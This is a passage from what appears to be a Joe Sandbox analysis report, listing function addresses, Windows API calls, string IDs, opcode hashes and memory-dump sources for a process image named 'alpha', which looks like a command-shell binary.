                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction Fuzzy Hash: 4F51EAB7B1878386E760AB25E85477AF6E1FB89F44F885230CA5D83B94DF78D4418710
                                      Function 00007FF755CA1884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmpwcsrchr
                                      • String ID: COPYCMD
                                      • API String ID: 2429825313-3727491224
                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                      • Instruction ID: aaeffb09b28b9758e9704bddbb5ccb7e6f147232475f4c7bbe824963b5a92faa
                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                      • Instruction Fuzzy Hash: 3FF1AFABF0865386FB60AF60D0401BDA6A1EB44F9CFC85635CE5E266D4DF3CA941C760
                                      Function 00007FF755CA4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$FullNamePathwcsrchr
                                      • String ID:
                                      • API String ID: 4289998964-0
                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction ID: 2bc3dc30813f671f8d3d0ba32f3f60f20a57944b64d7716b4676c0e0c261bc94
                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction Fuzzy Hash: 1EC1E5ABB0974782EA94BB91D548379E7A0FB45F98F886530CE5E037D0DF7CA4918320
                                      Function 00007FF755CCBCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                      • String ID:
                                      • API String ID: 3476366620-0
                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                      • Instruction ID: 4b5c35e20b1d7a49e63ab859cdb1ffa9c9b39e5487c71b98c03ed55bf13c13cd
                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                      • Instruction Fuzzy Hash: 052121BBD0868396EA547B60E4152BCEB50FF4AF2DFCC5275C56E422E5DF3CA4058620
                                      Function 00007FF755CA3D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                      • String ID: %9d
                                      • API String ID: 1006866328-2241623522
                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                      • Instruction ID: 1167753bfe2f3552742ccce1a8628f201e560d11848c6596a5e4594c3a951e11
                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                      • Instruction Fuzzy Hash: 4F5160FBA086438AE700EB51D8501A8BBA0FB44F6CF884639DA2D57795CF7CE5458B60
                                      Function 00007FF755CA8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                      • Instruction ID: 12c2a56faa528bd65345bb56ff2582af1ef2cae5551bf643164245f26c8165f7
                                      • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                      • Instruction Fuzzy Hash: A8C1D4BBA0968386EB64EB10E8506BDA7A0FB94B9CF884535DA5E07791DF3CD541C310
                                      Function 00007FF755CA9B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                      • Instruction ID: 967b25df4018bd5ba89fa37a7ef76610aa3c9f2aced7623c9551ac6d21b1eff6
                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                      • Instruction Fuzzy Hash: 5FA1B2ABA0868386EB60BB15E452679ABE1FF84F98FC84535DD4E47791DF3CE4018720
                                      Function 00007FF755CCFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DiskFreeSpace
                                      • String ID: %5lu
                                      • API String ID: 2448137811-2100233843
                                      • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                      • Instruction ID: 51ed836a159ce7297225919ad3cd475fd64b3711cad40564168c02ce6d5b9856
                                      • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                      • Instruction Fuzzy Hash: 624182BB708AC285EB61EF51E8506EAB760FB84B88F889035DA4D4B748DF7CD549C710
                                      Function 00007FF755CAD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 2081463915-1994581435
                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction ID: 7f187be84442132dabe8ac86962a60c902c156e88d21872a9b076c7b24e859c9
                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction Fuzzy Hash: 6E71A2EBE0864785FBA5BB64E454279AAE0AF01F5CFCC4939D50D426D1DF3CA481C760
                                      Function 00007FF755CA81D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr
                                      • String ID:
                                      • API String ID: 1497570035-0
                                      • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                      • Instruction ID: d1f633c6b6fb0e44b5fe9bcbbd241933e0feed8dfb5fa7369eab70d4c93784db
                                      • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                      • Instruction Fuzzy Hash: 36C1F5ABA0864386EA54FB11D4502B9EAA0FF85F5CFCC8535DA5E476D5EE3CE800C720
                                      Function 00007FF755CC7B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                      • Instruction ID: 35e8282dd6c65d539331454d6292c2bf794064cfd052869152998c373a10a7f2
                                      • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                      • Instruction Fuzzy Hash: A5A128ABB0829385EE54AB659414279E6D0EF45FE8FC86238DE7E477C4EE3CE4418310
                                      Function 00007FF755CA6BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • _pipe.MSVCRT ref: 00007FF755CA6C1E
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA6CD1
                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF755CA6CFB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 624391571-0
                                      • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                      • Instruction ID: e55fce43ba3432b5b8bb576e993a65082c0b7668566b214296acca3e6e7e4027
                                      • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                      • Instruction Fuzzy Hash: 4D71B0BBA0864386E704BF24D84007CBAA1EF85F5CB8C8638D65D562D2DF3CA8428760
                                      Function 00007FF755CC63FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                      • String ID:
                                      • API String ID: 4268342597-0
                                      • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                      • Instruction ID: 039e8d6bd0ebbcda67988a8f51bb1e8a517c71358c62ca7d9a3c3ab4b88ffc91
                                      • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                      • Instruction Fuzzy Hash: D9813CABA08B8381EA60EF29A540239F7A0FF45F88F9C5135D95D47794DF7CE4818720
                                      Function 00007FF755CB88C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: OpenToken$CloseProcessThread
                                      • String ID:
                                      • API String ID: 2991381754-0
                                      • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                      • Instruction ID: 03d1c4e7bd39eb33a5c1ad34bb4449736f9c0aa4de72b7810273aa77ba832b72
                                      • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                      • Instruction Fuzzy Hash: 3E21A0B7A0868387EB40AB50D4402BDF7A0EB85BB9FD84135DB5943684DF7CD848CB10
                                      Function 00007FF755CA586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF755CCC59E), ref: 00007FF755CA5879
                                        • Part of subcall function 00007FF755CA58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CA5903
                                        • Part of subcall function 00007FF755CA58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CA5943
                                        • Part of subcall function 00007FF755CA58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CA5956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValueVersion
                                      • String ID: %d.%d.%05d.%d
                                      • API String ID: 2996790148-3457777122
                                      • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                      • Instruction ID: b6a7d6b0b2589a00ac258bc0800e19f35b67d16c3cddc1aa6c8e074a7c60735b
                                      • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                      • Instruction Fuzzy Hash: 7DF0A0A3A0838287D750AF56B44006AEBA1FB88B85F988138DA4A07B5ACF3CD514CB50
                                      Function 00007FF755CB7854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 2831795651-0
                                      • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                      • Instruction ID: 355710f07c215fdf803fee34e9766a5a32598a771120d2a62c6b9f9a31cef68a
                                      • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                      • Instruction Fuzzy Hash: A3D181BBA0868386EB60AF21E4402AAB7A1FB44FA8FD81135DE4D07795DF7CD941C710
                                      Function 00007FF755CA7D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00007FF755CA7DA1
                                        • Part of subcall function 00007FF755CB417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB41AD
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA7EB7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                      • String ID:
                                      • API String ID: 168394030-0
                                      • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                      • Instruction ID: 379d33a66a43db0cd142a84019a4d9baa081ae99378e3a08315ffd16e3d6f97f
